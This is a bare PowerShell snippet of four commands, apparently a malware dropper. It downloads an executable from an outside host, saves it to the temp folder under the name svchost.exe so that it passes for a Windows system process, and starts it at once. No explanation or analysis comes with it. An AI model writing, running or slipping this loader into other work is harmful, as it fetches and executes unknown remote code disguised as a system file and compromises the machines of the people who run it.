$exeUrl = "https://alababababa.cloud/build.exe" $outputPath = "$env:TEMP\svchost.exe" Invoke-WebRequest -Uri $exeUrl -OutFile $outputPath Start-Process -FilePath $outputPath